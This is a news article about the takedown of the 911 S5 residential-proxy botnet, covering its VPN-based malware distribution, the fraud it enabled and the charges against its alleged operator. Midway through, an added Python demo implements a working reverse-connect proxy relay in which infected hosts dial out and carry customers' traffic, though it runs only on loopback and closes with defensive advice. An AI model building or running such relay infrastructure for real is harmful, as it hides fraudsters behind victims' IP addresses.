An international law enforcement operation led by the US Department of Justice has dismantled a botnet of more than 19 million infected IP addresses that was used to commit large-scale computer-enabled crime, including fraud, child exploitation, harassment, bomb threats, and export violations.
The botnet, sold as a residential proxy service known as “911 S5,” is believed to have infected over 19 million IP addresses, including 613,841 located in the US.
“Working with our international partners, the FBI conducted a joint, sequenced cyber operation to dismantle the 911 S5 Botnet — likely the world’s largest botnet ever,” said FBI Director Christopher Wray in a press statement. “The 911 S5 Botnet infected computers in nearly 200 countries and facilitated a whole host of computer-enabled crimes, including financial frauds, identity theft, and child exploitation.”
The bust also included the arrest of a People’s Republic of China national, YunHe Wang, a 35-year-old St. Kitts and Nevis citizen-by-investment, on charges of creating and deploying the malware used to amass a network of infected residential computers.
Using VPNs for deployments
Wang, according to the court documents, used virtual private network (VPN) applications such as MaskVPN and DewVPN as carriers for his malware and operated a pay-per-install model. The malware was also bundled into other downloads, such as pirated copies of licensed software and other copyrighted material.
“Allegedly, Wang created a bunch of sites offering ‘free VPN’ service. VPN is a type of software that creates a virtual encrypted tunnel over the Internet and is used legitimately by organizations to provide remote access for their employees to corporate services,” said Kevin Reed, chief information security officer at Acronis. “In the case of VPN software distributed by Wang, it provided a tunnel for its victims pretending to be a free VPN, but also the tunnel worked in reverse allowing Wang’s customers to access the Internet from the IP address of the unsuspecting victim.”
Wang allegedly managed approximately 150 dedicated servers worldwide, 76 of which he had leased from US-based service providers. “Using the dedicated servers, Wang deployed and managed applications, commanded and controlled the infected devices, operated his 911 S5 service, and provided paying customers with access to proxied IP addresses associated with the infected devices,” the Justice Department said in a press release.
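To make the reverse-tunnel arrangement described in the two paragraphs above concrete, here is an added, deliberately minimal illustration in Python. It is not 911 S5, MaskVPN or DewVPN code; the wire protocol (a one-line `CONNECT host:port` header followed by the payload, one request per parked connection) is an assumption made for the demo, and the three parties all run on loopback with ephemeral ports. The infected host (“agent”) only ever dials out, first to the operator’s relay and then to the target, so a consumer NAT or host firewall that blocks inbound traffic does not get in the way, and the target records the infected host’s address rather than the customer’s. That address laundering is the property customers were paying for.

```python
import socket
import threading
from collections import deque

HOST = "127.0.0.1"   # every party runs on loopback; all input below is constructed for the demo


def recv_until_eof(sock):
    """Read until the peer half-closes with shutdown(SHUT_WR)."""
    chunks = []
    while True:
        data = sock.recv(4096)
        if not data:
            return b"".join(chunks)
        chunks.append(data)


def listener():
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((HOST, 0))          # ephemeral port
    srv.listen(16)
    return srv


class Origin:
    """Stand-in for a web site: records the source address of every connection it gets."""

    def __init__(self):
        self.srv = listener()
        self.port = self.srv.getsockname()[1]
        self.peers = []
        threading.Thread(target=self._serve, daemon=True).start()

    def _serve(self):
        while True:
            conn, peer = self.srv.accept()
            self.peers.append(peer)
            body = recv_until_eof(conn).decode()
            conn.sendall(f"origin saw {peer[0]}:{peer[1]} send {body!r}".encode())
            conn.close()


class Relay:
    """Operator-side server: infected hosts dial in and park; customers dial in and get paired."""

    def __init__(self):
        self.agent_srv, self.customer_srv = listener(), listener()
        self.agent_port = self.agent_srv.getsockname()[1]
        self.customer_port = self.customer_srv.getsockname()[1]
        self.idle_agents = deque()               # parked outbound connections from infected hosts
        self.available = threading.Semaphore(0)
        threading.Thread(target=self._accept_agents, daemon=True).start()
        threading.Thread(target=self._accept_customers, daemon=True).start()

    def _accept_agents(self):
        while True:
            conn, _ = self.agent_srv.accept()
            self.idle_agents.append(conn)
            self.available.release()

    def _accept_customers(self):
        while True:
            conn, _ = self.customer_srv.accept()
            threading.Thread(target=self._serve_customer, args=(conn,), daemon=True).start()

    def _serve_customer(self, customer):
        request = recv_until_eof(customer)
        self.available.acquire()                 # wait for an idle infected host
        agent = self.idle_agents.popleft()
        agent.sendall(request)                   # push the request down the parked tunnel
        agent.shutdown(socket.SHUT_WR)
        customer.sendall(recv_until_eof(agent))  # relay the reply back up to the customer
        agent.close()
        customer.close()


def agent_once(relay_agent_port):
    """One infected host serving one request; outbound connections only, never listens.
    Returns the local address of its socket to the target, i.e. what the target sees."""
    up = socket.create_connection((HOST, relay_agent_port))
    request = recv_until_eof(up)                 # blocks until the relay assigns a customer
    header, _, payload = request.partition(b"\n")
    host, port = header.decode().split(" ", 1)[1].rsplit(":", 1)   # assumed "CONNECT host:port"
    down = socket.create_connection((host, int(port)))
    exit_addr = down.getsockname()
    down.sendall(payload)
    down.shutdown(socket.SHUT_WR)
    up.sendall(recv_until_eof(down))
    down.close()
    up.close()
    return exit_addr


def customer_fetch(relay_customer_port, host, port, payload):
    """A paying customer asks the relay to reach host:port through an infected host."""
    s = socket.create_connection((HOST, relay_customer_port))
    own_addr = s.getsockname()
    s.sendall(f"CONNECT {host}:{port}\n".encode() + payload)
    s.shutdown(socket.SHUT_WR)
    reply = recv_until_eof(s)
    s.close()
    return own_addr, reply


def demo():
    """Run one proxied request and report whose address the origin recorded."""
    origin, relay, seen = Origin(), Relay(), {}
    t = threading.Thread(target=lambda: seen.setdefault("exit", agent_once(relay.agent_port)))
    t.start()
    customer_addr, reply = customer_fetch(relay.customer_port, HOST, origin.port, b"GET /whoami")
    t.join(5)
    return {"customer": customer_addr, "exit": seen["exit"],
            "origin_saw": origin.peers[0], "reply": reply.decode()}


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key:>10}: {value}")
```

Running it shows `origin_saw` equal to the agent’s outbound address and different from the customer’s, which is why fraud-detection systems keyed on source IP reputation see an ordinary residential connection. The defensive takeaway is the same one that applies to any reverse-connect implant: on the victim side the only observable is a long-lived outbound connection to the operator’s server, so egress monitoring and proxy-aware network logging matter more than inbound filtering.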
Authorities confirmed Wang was financially motivated with no nation-state connections. Charges against him include conspiracy to commit computer fraud, substantive computer fraud, conspiracy to commit wire fraud, and conspiracy to commit money laundering.
Botnet used for massive frauds
Several 911 S5 customers allegedly targeted pandemic relief programs, according to the court documents, using IP addresses purchased from 911 S5 to conceal their true locations.
In one case, an estimated 560,000 fraudulent unemployment insurance claims were filed from compromised IP addresses during the pandemic, resulting in a confirmed fraudulent loss exceeding $5.9 billion, according to the release. Proxied IP addresses were also used to submit more than 47,000 fraudulent Economic Injury Disaster Loan (EIDL) applications, with losses running into the millions of dollars.
“Law enforcement initially focused on 911 S5 during an investigation of a money laundering and smuggling scheme, where criminal actors in Ghana and the United States used hijacked IP addresses purchased from 911 S5 to place fraudulent orders using stolen credit cards on the Army and Air Force Exchange Service (AAFES) online e-commerce platform known as ShopMyExchange,” authorities said in the release. “Although approximately 2,525 fraudulent orders valued at $5.5 million were submitted, credit card fraud detection systems and federal investigators were able to thwart the bulk of the attempted purchases, reducing the actual loss to approximately $254,000.”
If convicted on all counts, Wang faces a maximum penalty of 65 years in prison. An attorney for Wang could not be immediately identified, according to reports. The FBI is operating a webpage to help potential victims check whether their devices were compromised.